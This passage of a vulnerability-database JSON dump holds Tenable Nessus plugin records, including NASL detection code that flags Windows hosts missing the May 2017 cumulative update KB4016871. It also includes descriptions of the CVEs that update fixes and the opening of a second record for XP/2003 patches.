elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. 
An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": 
"2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. 
(CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:25:02", "description": "The remote Windows host is missing a security update. 
It is, therefore, affected by one or more of the following vulnerabilities :\n\n - A remote code execution vulnerability exists in how the Remote Desktop Protocol (RDP) handles requests if the RDP server has Smart Card authentication enabled. An authenticated, remote attacker can exploit this, via a specially crafted application, to execute arbitrary code with full user privileges. (CVE-2017-0176)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A buffer overflow condition exists in the IIS WebDAV service due to improper handling of the 'If' header in a PROPFIND request. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to cause a denial of service condition or the execution of arbitrary code. This vulnerability, also known as EXPLODINGCAN, is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. (CVE-2017-7269)\n\n - A remote code execution vulnerability exists in how the Remote Desktop Protocol (RDP) handles requests if the RDP server has Routing and Remote Access enabled. An authenticated, remote attacker can exploit this, via a specially crafted application, to execute arbitrary code with full user privileges. (CVE-2017-8461)\n\n - A remote code execution vulnerability exists in Windows OLE, specifically in olecnv32.dll, due to improper validation of user-supplied input. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted file or email, to execute arbitrary code in the context of the current user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Microsoft Security Advisory 4025685: Guidance for older platforms (XP / 2003) (EXPLODINGCAN)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0176", "CVE-2017-0222", "CVE-2017-0267", "CVE-2017-7269", "CVE-2017-8461", "CVE-2017-8487", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:iis"], "id": "SMB_NT_MS17_JUNE_XP_2003.NASL", "href": "https://www.tenable.com/plugins/nessus/100791", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100791);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0176\",\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-7269\",\n \"CVE-2017-8461\",\n \"CVE-2017-8487\",\n \"CVE-2017-8543\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 97127,\n 98127,\n 98259,\n 98752,\n 98824,\n 99012,\n 99013,\n 99035\n );\n 
